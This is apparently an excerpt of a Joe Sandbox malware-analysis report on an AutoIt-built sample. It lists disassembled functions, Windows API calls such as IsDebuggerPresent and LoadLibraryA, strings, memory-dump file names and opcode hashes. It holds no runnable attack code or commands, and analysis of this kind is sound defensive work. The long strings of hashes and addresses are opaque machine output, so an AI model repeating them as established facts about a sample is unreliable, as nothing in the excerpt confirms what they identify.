                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: ClassMessageNameSend_memmove
                                          • String ID: ComboBox$ListBox
                                          • API String ID: 372448540-1403004172
                                          • Opcode ID: 619f21fc8d185633998102381df079fcd2ffc4da2a750def61e6d7e7f87a5e54
                                          • Instruction ID: 7ef6a14d519b0d724d2e3b28ed939ca59cf0596753f6a667b98bf0662cb78bf0
                                          • Opcode Fuzzy Hash: 619f21fc8d185633998102381df079fcd2ffc4da2a750def61e6d7e7f87a5e54
                                          • Instruction Fuzzy Hash: BB01DBB2A4610467CB14EBA4CA52FFF77AC9F12340F500019B896B32D3DB659F189672
                                          Function 001154E3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 29COMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: ClassName_wcscmp
                                          • String ID: #32770
                                          • API String ID: 2292705959-463685578
                                          • Opcode ID: 9668fb3eec0610a8cff9e49ba96de7febd86d6ac16ef98c5d8cf26d3248b9f3e
                                          • Instruction ID: 2b4357272bcd292660261a025dc35a00413f2abedfca76ebc8ca6cdc3c8769b4
                                          • Opcode Fuzzy Hash: 9668fb3eec0610a8cff9e49ba96de7febd86d6ac16ef98c5d8cf26d3248b9f3e
                                          • Instruction Fuzzy Hash: ECE0617650432867D3209659AC49FD7F7ECDB45771F000027FD04D3051E670A98087E1
                                          Function 00108892 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 22windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 001088A0
                                            • Part of subcall function 000D3588: _doexit.LIBCMT ref: 000D3592
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: Message_doexit
                                          • String ID: AutoIt$Error allocating memory.
                                          • API String ID: 1993061046-4017498283
                                          • Opcode ID: 5712525d9ce265d18445fadfe85b2e918e628474271e98e2915a5a12141261ca
                                          • Instruction ID: f5dc441bffac166e813465e6d57b8d11e6a5bf870eca34838681dbf0f448dece
                                          • Opcode Fuzzy Hash: 5712525d9ce265d18445fadfe85b2e918e628474271e98e2915a5a12141261ca
                                          • Instruction Fuzzy Hash: C2D05B3138536832D21536A47C1BFCA7A488F05B51F44442BFB48655D34EE595D041E6
                                          Function 000EB4F1 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22COMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 000EB544: _memset.LIBCMT ref: 000EB551
                                            • Part of subcall function 000D0B74: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,000EB520,?,?,?,000B100A), ref: 000D0B79
                                          • IsDebuggerPresent.KERNEL32(?,?,?,000B100A), ref: 000EB524
                                          • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,000B100A), ref: 000EB533
                                          Strings
                                          • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 000EB52E
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString_memset
                                          • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                          • API String ID: 3158253471-631824599
                                          • Opcode ID: eec97539231a01aae001dba7b3e85ecfdc2268d3df2a8aaa879205b105625869
                                          • Instruction ID: ddc04a78f223ce721efadce87d4e04a198694fccfffd8562bb4c0297f667dff0
                                          • Opcode Fuzzy Hash: eec97539231a01aae001dba7b3e85ecfdc2268d3df2a8aaa879205b105625869
                                          • Instruction Fuzzy Hash: 38E06D74200B518FD321AF66E404B437AF0AF04745F00891EE866D7B51EBB5D588CBA1
                                          Function 000F0251 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21COMMON
                                          Download Yara Rule
                                          APIs
                                          • GetSystemDirectoryW.KERNEL32(?), ref: 000F0091
                                            • Part of subcall function 0012C6D9: LoadLibraryA.KERNEL32(kernel32.dll,?,000F027A,?), ref: 0012C6E7
                                            • Part of subcall function 0012C6D9: GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 0012C6F9
                                          • FreeLibrary.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000104), ref: 000F0289
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: Library$AddressDirectoryFreeLoadProcSystem
                                          • String ID: WIN_XPe
                                          • API String ID: 582185067-3257408948
                                          • Opcode ID: a15148a7dfb58afaca076488640c516c8ab8fd77afede5a54cc5951afa3b2b46
                                          • Instruction ID: 251bbaa7e0400e92cad00cab4ba16f2125628fd2d58c7823e48ab7c601a3dac5
                                          • Opcode Fuzzy Hash: a15148a7dfb58afaca076488640c516c8ab8fd77afede5a54cc5951afa3b2b46
                                          • Instruction Fuzzy Hash: 31F0C071805109DFCB65DB61C958BFC7BF8AB48340F140085E246A25A2CB754F84EF21